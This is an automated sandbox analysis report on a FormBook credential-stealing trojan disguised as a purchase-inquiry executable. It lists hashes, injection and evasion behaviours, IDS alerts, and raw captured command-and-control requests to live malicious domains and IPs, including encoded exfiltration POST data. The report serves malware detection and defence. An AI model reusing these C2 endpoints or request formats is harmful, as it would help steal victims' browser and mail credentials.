Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CSZ inquiry for MH raw material.exe

Overview

General Information

Sample name:CSZ inquiry for MH raw material.exe
Analysis ID:1590081
MD5:2a3034abc9b8ee8875f9cd98c388ab07
SHA1:0cfe449dad046b2b0cf594841f675e9d21ecdb1d
SHA256:b022e4df0d9e6c8eeea122e642708a9d13b8a7e861a4d121e0c54e80a28a1cc4
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CSZ inquiry for MH raw material.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe" MD5: 2A3034ABC9B8EE8875F9CD98C388AB07)
    • mSWyWMUGFWJCYT.exe (PID: 2340 cmdline: "C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 3308 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • mSWyWMUGFWJCYT.exe (PID: 524 cmdline: "C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 2040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:12:00.551136+010020507451Malware Command and Control Activity Detected192.168.2.74997047.83.1.9080TCP
              2025-01-13T15:12:23.765934+010020507451Malware Command and Control Activity Detected192.168.2.74997584.32.84.3280TCP
              2025-01-13T15:12:37.125958+010020507451Malware Command and Control Activity Detected192.168.2.749979104.21.18.17180TCP
              2025-01-13T15:12:51.673190+010020507451Malware Command and Control Activity Detected192.168.2.749983134.122.135.4880TCP
              2025-01-13T15:13:04.984315+010020507451Malware Command and Control Activity Detected192.168.2.749987199.192.21.16980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:12:00.551136+010028554651A Network Trojan was detected192.168.2.74997047.83.1.9080TCP
              2025-01-13T15:12:23.765934+010028554651A Network Trojan was detected192.168.2.74997584.32.84.3280TCP
              2025-01-13T15:12:37.125958+010028554651A Network Trojan was detected192.168.2.749979104.21.18.17180TCP
              2025-01-13T15:12:51.673190+010028554651A Network Trojan was detected192.168.2.749983134.122.135.4880TCP
              2025-01-13T15:13:04.984315+010028554651A Network Trojan was detected192.168.2.749987199.192.21.16980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:12:16.130205+010028554641A Network Trojan was detected192.168.2.74997284.32.84.3280TCP
              2025-01-13T15:12:18.671305+010028554641A Network Trojan was detected192.168.2.74997384.32.84.3280TCP
              2025-01-13T15:12:21.231723+010028554641A Network Trojan was detected192.168.2.74997484.32.84.3280TCP
              2025-01-13T15:12:29.500646+010028554641A Network Trojan was detected192.168.2.749976104.21.18.17180TCP
              2025-01-13T15:12:32.013724+010028554641A Network Trojan was detected192.168.2.749977104.21.18.17180TCP
              2025-01-13T15:12:34.547791+010028554641A Network Trojan was detected192.168.2.749978104.21.18.17180TCP
              2025-01-13T15:12:43.965959+010028554641A Network Trojan was detected192.168.2.749980134.122.135.4880TCP
              2025-01-13T15:12:46.486294+010028554641A Network Trojan was detected192.168.2.749981134.122.135.4880TCP
              2025-01-13T15:12:49.063476+010028554641A Network Trojan was detected192.168.2.749982134.122.135.4880TCP
              2025-01-13T15:12:57.418188+010028554641A Network Trojan was detected192.168.2.749984199.192.21.16980TCP
              2025-01-13T15:12:59.875023+010028554641A Network Trojan was detected192.168.2.749985199.192.21.16980TCP
              2025-01-13T15:13:02.590146+010028554641A Network Trojan was detected192.168.2.749986199.192.21.16980TCP
              2025-01-13T15:13:11.105513+010028554641A Network Trojan was detected192.168.2.749988154.197.162.23980TCP
              2025-01-13T15:13:14.071351+010028554641A Network Trojan was detected192.168.2.749989154.197.162.23980TCP
              2025-01-13T15:13:16.637822+010028554641A Network Trojan was detected192.168.2.749990154.197.162.23980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: CSZ inquiry for MH raw material.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.gayhxi.info/k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLxAvira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: CSZ inquiry for MH raw material.exeReversingLabs: Detection: 73%
              Source: CSZ inquiry for MH raw material.exeVirustotal: Detection: 66%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: CSZ inquiry for MH raw material.exeJoe Sandbox ML: detected
              Source: CSZ inquiry for MH raw material.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mSWyWMUGFWJCYT.exe, 00000009.00000000.1586785927.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000000.1731726848.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBC870 FindFirstFileW,FindNextFileW,FindClose,10_2_02EBC870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax10_2_02EA9EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi10_2_02EAE4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h10_2_035204CE
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 4x nop then pop edi11_2_056E0529
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 4x nop then pop edi11_2_056CF538
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 4x nop then pop edi11_2_056D15BD
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 4x nop then xor eax, eax11_2_056D4D9C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 4x nop then pop edi11_2_056E04BE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49987 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49987 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49979 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49979 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49975 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49975 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49983 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49983 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49970 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 199.192.21.169:80
              Source: Joe Sandbox ViewIP Address: 154.197.162.239 154.197.162.239
              Source: Joe Sandbox ViewIP Address: 104.21.18.171 104.21.18.171
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 219Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 70 74 48 38 41 36 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 65 36 79 38 53 75 72 53 76 4f 35 54 61 70 46 73 42 52 59 2f 54 42 56 4b 39 6b 46 45 44 4a 52 72 53 30 68 66 6c 62 39 76 64 68 51 4a 48 62 6e 75 41 3d 3d Data Ascii: ptH8A6=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczve6y8SurSvO5TapFsBRY/TBVK9kFEDJRrS0hflb9vdhQJHbnuA==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRmZ9nQhzZ1ed1fDgmXGma8fB955uWuMTV8O1iz8AqD2aGDGSMd9dvFv%2BK29jSV8Zx%2BJYsY4Df0V%2FXyim2dUT2l11S%2BCFzCwQn0Q5XRMz8uMGny9xBlGyjN0zGAdNHwofnJi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb42dde8de94-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAi78G7bk18YaOPZQcAA5oxz2RaU3O%2BtaYxPTSCc2V%2BAbngqXXTQtTAS%2FuMJtCNFF6U3pfEqHgU7WyvxgthiSmh8ugeXSgldG53n55%2BM6uI2WvZAnrr4JBRpn1SBkGtI4mnI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb527da98c1b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
